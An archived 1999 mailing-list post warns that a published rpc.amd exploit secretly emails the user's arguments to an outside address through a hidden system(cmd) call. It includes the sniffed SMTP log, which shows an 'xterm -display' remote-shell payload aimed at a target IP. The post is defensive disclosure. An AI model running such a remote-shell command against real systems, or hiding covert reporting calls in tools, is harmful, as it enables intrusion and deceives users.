Hello, Sorry if this was already known, recently Someone named Taeho Oh published an exploit for a buffer overflow in rpc.amd (automount) While testing this exploit on my on server, i saw that i was opening a connection to ohhara.postech.ac.kr on port 25, After a little research i found out that The exploit (In it's original form) was sending an email to abuserat_private and listing the arguments i just entered, There is an easy way to stop it from sending Just comment the line: system(cmd); Here's the log as i got it from sniffit: EHLO BlackMesa.com MAIL From:<lockeat_private> SIZE=95 RCPT To:<abuserat_private> DATA Received: (from root@localhost) by BlackMesa.com (8.9.3/8.9.3) id FAA01208 for abuserat_private; Sat, 4 Sep 1999 05:30:56 +0200 Date: Sat, 4 Sep 1999 05:30:56 +0200 From: locke <lockeat_private> Message-Id: <199909040330.FAA01208at_private> To: abuserat_private 10.0.0.9 /usr/X11R6/bin/xterm -display 10.0.0.8:0 . QUIT QUIT (Ip's changed to protect the innocent) Bye
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:01:34 PDT